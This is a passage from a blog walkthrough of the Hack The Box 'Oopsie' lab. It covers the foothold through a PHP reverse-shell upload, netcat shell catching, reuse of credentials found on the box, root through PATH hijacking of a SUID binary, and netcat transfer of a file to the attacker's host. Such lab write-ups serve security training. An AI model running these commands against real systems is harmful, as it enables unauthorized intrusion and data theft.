intercept request one by one.</blockquote><figure class="kg-card kg-image-card"><amp-img src="http://192.168.8.3:2368/content/images/2021/05/image-17.png" class="kg-image" alt width="1219" height="332" srcset="http://192.168.8.3:2368/content/images/size/w600/2021/05/image-17.png 600w, http://192.168.8.3:2368/content/images/size/w1000/2021/05/image-17.png 1000w, http://192.168.8.3:2368/content/images/2021/05/image-17.png 1219w" layout="responsive"></amp-img></figure><hr></hr><h2 id="02-foothold">02. Foothold</h2><p>Let's bump to the upload page, and now it accessible.</p><figure class="kg-card kg-image-card kg-card-hascaption"><amp-img src="https://gblobscdn.gitbook.com/assets%2F-MYKZU_ttgeJRDD_2odP%2F-MZSt7UdnB1ieM7P581_%2F-MZSuR_Q0y8Wo26BwTQF%2Fimage.png?alt=media&amp;token=9e9655cc-363d-4163-addf-6d02a3e0505e" class="kg-image" alt width="1161" height="534" layout="responsive"></amp-img><figcaption><span class="text-4505230f--TextH400-3033861f--textContentFamily-49a318e1"><div><div>Enter a caption for this image (optional)</div></div></span></figcaption></figure><p>Let's check whether we can upload <code>PHP web shell</code> or what kind of file type are they need to be uploaded. First copy the PHP Reverse shell to our current directory.</p><pre><code class="language-bash">┌──(root💀Hidd3nWiki)-[~/Documents/Oopsie]
└─# cp /usr/share/webshells/php/php-reverse-shell.php .</code></pre><p>Then we can open that <code>php-reverse-shell.php</code> whatever text editor you like and edit the below changes. 👇</p><figure class="kg-card kg-image-card"><amp-img src="http://192.168.8.3:2368/content/images/2021/05/image-18.png" class="kg-image" alt width="484" height="118" layout="responsive"></amp-img></figure><p>And I rename that file to <code>hiddenwiki.php</code>. Let's upload the file.</p><blockquote>Note : You must change the cookie to super admin do upload the file. but in my case it is auto replace by burp match and replace.</blockquote><figure class="kg-card kg-image-card"><amp-img src="http://192.168.8.3:2368/content/images/2021/05/image-19.png" class="kg-image" alt width="1889" height="523" srcset="http://192.168.8.3:2368/content/images/size/w600/2021/05/image-19.png 600w, http://192.168.8.3:2368/content/images/size/w1000/2021/05/image-19.png 1000w, http://192.168.8.3:2368/content/images/size/w1600/2021/05/image-19.png 1600w, http://192.168.8.3:2368/content/images/2021/05/image-19.png 1889w" layout="responsive"></amp-img></figure><p>File has been uploaded, Now we need to find where the file is.</p><p>We have lots of fuzzing tools, but I personally love <a href="https://twitter.com/_maurosoria" rel="noopener noreferrer">Mauro Soria's</a> <a href="https://github.com/maurosoria/dirsearch" rel="noopener noreferrer">Dirsearch </a>tool. it has amazing fast output and also can customize the script because it was written using python3. For the wordlist I used <a href="https://danielmiessler.com/" rel="noopener noreferrer">Daniel Miessler's</a> <a href="https://github.com/danielmiessler/SecLists" rel="noopener noreferrer">SecLists</a>.</p><p>Now power up the <code>dirsearch </code>tool and wait for the results.</p><pre><code class="language-bash">dirsearch.py -u http://10.10.10.28/ -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
</code></pre><p>From the beginning of the results we got directory called <code>uploads</code>.</p><pre><code class="language-bash">┌──(root💀Hidd3nWiki)-[~/Documents/Oopsie]
└─# /opt/dirsearch/dirsearch.py -u http://10.10.10.28/ -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt                                                                              1 ⨯

  _|. _ _  _  _  _ _|_    v0.4.1
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js, txt, xhtml | HTTP method: GET | Threads: 30 | Wordlist size: 560493

Error Log: /opt/dirsearch/logs/errors-21-04-16_09-31-10.log

Target: http://10.10.10.28/

Output File: /opt/dirsearch/reports/10.10.10.28/_21-04-16_09-31-11.txt

[09:31:11] Starting:
[09:31:16] 403 -  276B  - /js/     (Added to queue)
[09:31:16] 301 -  307B  - /js  -&gt;  http://10.10.10.28/js/
[09:31:17] 403 -  276B  - /images/     (Added to queue)
[09:31:17] 403 -  276B  - /css/     (Added to queue)
[09:31:17] 301 -  308B  - /css  -&gt;  http://10.10.10.28/css/
[09:31:18] 301 -  311B  - /images  -&gt;  http://10.10.10.28/images/
[09:31:18] 301 -  311B  - /themes  -&gt;  http://10.10.10.28/themes/     (Added to queue)
[09:31:18] 403 -  276B  - /themes/
[09:31:22] 301 -  312B  - /uploads  👈-&gt;  http://10.10.10.28/uploads/     (Added to queue)
[09:31:22] 403 -  276B  - /uploads/
[09:31:37] 200 -   11KB - /index.php
[09:31:40] 403 -  276B  - /fonts/     (Added to queue)
[09:31:40] 301 -  310B  - /fonts  -&gt;  http://10.10.10.28/fonts/</code></pre><p>Now it's time to powerup netcat listener and we can use curl command to fetch the uploaded file.</p><pre><code class="language-bash">┌──(root💀Hidd3nWiki)-[~/Documents/Oopsie]
└─# nc -lvnp 4444
listening on [any] 4444 ...</code></pre><pre><code class="language-bash">┌──(root💀Hidd3nWiki)-[~/Documents/Oopsie]
└─# curl http://10.10.10.28/uploads/hiddenwiki.php</code></pre><figure class="kg-card kg-image-card"><amp-img src="http://192.168.8.3:2368/content/images/2021/05/image-20.png" class="kg-image" alt width="1442" height="386" srcset="http://192.168.8.3:2368/content/images/size/w600/2021/05/image-20.png 600w, http://192.168.8.3:2368/content/images/size/w1000/2021/05/image-20.png 1000w, http://192.168.8.3:2368/content/images/2021/05/image-20.png 1442w" layout="responsive"></amp-img></figure><p>We land a shell as <code>www-data</code> and proceed to upgrade it. Type below command to spawn our shell 👇</p><pre><code class="language-bash">python3 -c 'import pty;pty.spawn("/bin/bash")'</code></pre><pre><code class="language-bash">┌──(root💀Hidd3nWiki)-[~/Documents/Oopsie]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.101] from (UNKNOWN) [10.10.10.28] 53294
Linux oopsie 4.15.0-76-generic #86-Ubuntu SMP Fri Jan 17 17:24:28 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 12:18:36 up  5:32,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@oopsie:/$ pwd
pwd
/
www-data@oopsie:/$</code></pre><p>First check web user directory where it has some interesting information.</p><pre><code class="language-bash">www-data@oopsie:/var/www/html/cdn-cgi/login$ ls
ls
admin.php  db.php  index.php  script.js</code></pre><p>Here we found <code>db.php</code> file in <code>/var/www/html/cdn-cgi/</code>login directory. let's view the file.</p><pre><code class="language-bash">www-data@oopsie:/var/www/html/cdn-cgi/login$ cat db.php
cat db.php
&lt;?php
$conn = mysqli_connect('localhost','robert','M3g4C0rpUs3r!','garage');
?&gt;</code></pre><p>Oh! here we found new user credentials.</p><ul><li>robert:M3g4C0rpUs3r!</li></ul><p>So let’s access Robert’s user, providing the password found. <code>su robert</code></p><pre><code class="language-bash">www-data@oopsie:/var/www/html/cdn-cgi/login$ su robert
su robert
Password: M3g4C0rpUs3r!

robert@oopsie:/var/www/html/cdn-cgi/login$</code></pre><p>Yes it works and now we are in <code>robert</code> user. we can view our user flag now. Let's check and submit it to HTB.</p><pre><code class="language-bash">robert@oopsie:~$ cat user.txt
cat user.txt
f2c74*******************b7981</code></pre><figure class="kg-card kg-image-card"><amp-img src="http://192.168.8.3:2368/content/images/2021/05/image-21.png" class="kg-image" alt width="545" height="269" layout="responsive"></amp-img></figure><h2 id="03-privilege-escalation">03. Privilege Escalation</h2><p>Now we are on the last step. We need to find root flag.</p><p>Now we are robert. So again, look around the file system, First we can use <code>id </code>command to verify in which user group we are now. Let's check it.</p><pre><code class="language-bash">robert@oopsie:/$ id
id
uid=1000(robert) gid=1000(robert) groups=1000(robert),1001(bugtracker)</code></pre><p>As above result; we see that this robert is part of a <code>bugtrack </code>group. Now let's check for what files this group has the access.</p><pre><code class="language-bash">find / -type f -group bugtracker 2&gt; /dev/null</code></pre><pre><code class="language-bash">robert@oopsie:/$ find / -type f -group bugtracker 2&gt; /dev/null
find / -type f -group bugtracker 2&gt; /dev/null
/usr/bin/bugtracker</code></pre><p>There is a binary file called<code>bugtracker</code> and also we notice that it has SUID permissions.</p><pre><code class="language-bash">robert@oopsie:/$ ls -l /usr/bin/bugtracker
ls -l /usr/bin/bugtracker
-rwsr-xr-- 1 root bugtracker 8792 Jan 25  2020 /usr/bin/bugtracker</code></pre><blockquote>The ‘s’ in the user ‘execute’ field, it runs ‘as’ its creator, in this case, root. 😋😋😎</blockquote><p>Let's run the file and check what are the mess around that file.</p><pre><code class="language-bash">robert@oopsie:/$ /usr/bin/bugtracker
/usr/bin/bugtracker

------------------
: EV Bug Tracker :
------------------

Provide Bug ID: 000
000
---------------

cat: /root/reports/000: No such file or directory</code></pre><p>Nothing interesting found. let's check <code>strings </code>command to analyze the binary file for any hard-coded information.</p><pre><code class="language-bash">strings /usr/bin/bugtracker</code></pre><figure class="kg-card kg-image-card"><amp-img src="http://192.168.8.3:2368/content/images/2021/05/image-22.png" class="kg-image" alt width="464" height="277" layout="responsive"></amp-img></figure><p>When looking around the output, you can see that it looks like a system command which is calling the <code>cat </code>command using the <code>relative path</code> instead of the <code>absolute path</code>. So what's on your mind now. yes we can create malicious file called cat and modifying the path to include the current working directory. Using that method we can abuse this misconfiguration and escalate our privileges to root.😎😎</p><p>Let's create the file, make it as executable and add the current working directory to PATH.</p><pre><code class="language-bash">cd /tmp/
echo '/bin/sh' &gt; cat
chmod +x cat
export PATH=/tmp:$PATH</code></pre><p>Now let's run the<code> /usr/bin/bugtracker</code> binary again.</p><figure class="kg-card kg-image-card kg-card-hascaption"><amp-img src="https://gblobscdn.gitbook.com/assets%2F-MYKZU_ttgeJRDD_2odP%2F-MZSgSPKjNqQ-mEDVXhy%2F-MZSoGcsrdEUcsi2kygI%2Fimage.png?alt=media&amp;token=c710b183-2f75-4ea4-8855-4b7905933303" class="kg-image" alt width="699" height="443" layout="responsive"></amp-img><figcaption><span class="text-4505230f--TextH400-3033861f--textContentFamily-49a318e1"><div><div>Enter a caption for this image (optional)</div></div></span></figcaption></figure><p>Now we are landing as root. The last step; let's check the root flag and submit it to the HTB.</p><blockquote>Here I was unable to view the root.txt flag using cat,vi,nano commands. so instead of view the flag, I'm going to use netcat and get that file to my host.</blockquote><p>-- On the receiving end (My host)</p><pre><code class="language-bash">nc -l -p 7878 &gt; root.txt</code></pre><p>-- On the sending end (Oopsie machine)</p><pre><code class="language-bash">nc -w 3 destination-ip 7878 &lt; root.txt</code></pre><figure class="kg-card kg-image-card"><amp-img src="http://192.168.8.3:2368/content/images/2021/05/image-23.png" class="kg-image" alt width="717" height="396" srcset="http://192.168.8.3:2368/content/images/size/w600/2021/05/image-23.png 600w, http://192.168.8.3:2368/content/images/2021/05/image-23.png 717w" layout="responsive"></amp-img></figure><figure class="kg-card kg-image-card"><amp-img src="http://192.168.8.3:2368/content/images/2021/05/image-24.png" class="kg-image" alt width="858" height="636" srcset="http://192.168.8.3:2368/content/images/size/w600/2021/05/image-24.png 600w, http://192.168.8.3:2368/content/images/2021/05/image-24.png 858w" layout="responsive"></amp-img></figure><hr></hr><h2 id="04-post-exploitation">04. Post Exploitation</h2><p>Inside root's folder, we see a <code>.config </code>folder, which contains a <code>FileZilla</code> config file with the credentials <code>ftpuser : mc@F1l3ZilL4</code> visible in plain text.</p><figure class="kg-card kg-image-card"><amp-img src="http://192.168.8.3:2368/content/images/2021/05/image-25.png" class="kg-image" alt width="1742" height="642" srcset="http://192.168.8.3:2368/content/images/size/w600/2021/05/image-25.png 600w, http://192.168.8.3:2368/content/images/size/w1000/2021/05/image-25.png 1000w, http://192.168.8.3:2368/content/images/size/w1600/2021/05/image-25.png 1600w, http://192.168.8.3:2368/content/images/2021/05/image-25.png 1742w" layout="responsive"></amp-img></figure><p>That’s all for now! We’ll keep in mind that some of the info collected (like credentials, folders…) can be useful in the next 7 labs of the ‘Starting Point’ path. Thanks for reading and happy hacking!</p><p><strong>Find me on </strong><a href="https://twitter.com/ShapManasick" rel="noopener noreferrer">@twitter</a></p>

            </section>

        </article>
    </main>
    <footer class="page-footer">
            <amp-img class="site-icon" src="http://192.168.8.3:2368/content/images/2021/05/hnet.com-image.ico" width="50" height="50" layout="fixed"></amp-img>
        <h3>h4rithd.com</h3>
            <p>Penetration Tester | Ethical Hacker | Security Researcher</p>
        <p><a href="../../index.html">Read more posts →</a></p>
        <a class="powered" href="https://ghost.org" target="_blank" rel="noopener"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 156 156"><g fill="none" fill-rule="evenodd"><rect fill="#15212B" width="156" height="156" rx="27"/><g transform="translate(36 36)" fill="#F6F8FA"><path d="M0 71.007A4.004 4.004 0 014 67h26a4 4 0 014 4.007v8.986A4.004 4.004 0 0130 84H4a4 4 0 01-4-4.007v-8.986zM50 71.007A4.004 4.004 0 0154 67h26a4 4 0 014 4.007v8.986A4.004 4.004 0 0180 84H54a4 4 0 01-4-4.007v-8.986z"/><rect y="34" width="84" height="17" rx="4"/><path d="M0 4.007A4.007 4.007 0 014.007 0h41.986A4.003 4.003 0 0150 4.007v8.986A4.007 4.007 0 0145.993 17H4.007A4.003 4.003 0 010 12.993V4.007z"/><rect x="67" width="17" height="17" rx="4"/></g></g></svg> Published with Ghost</a>
    </footer>
    
</body>
</html>
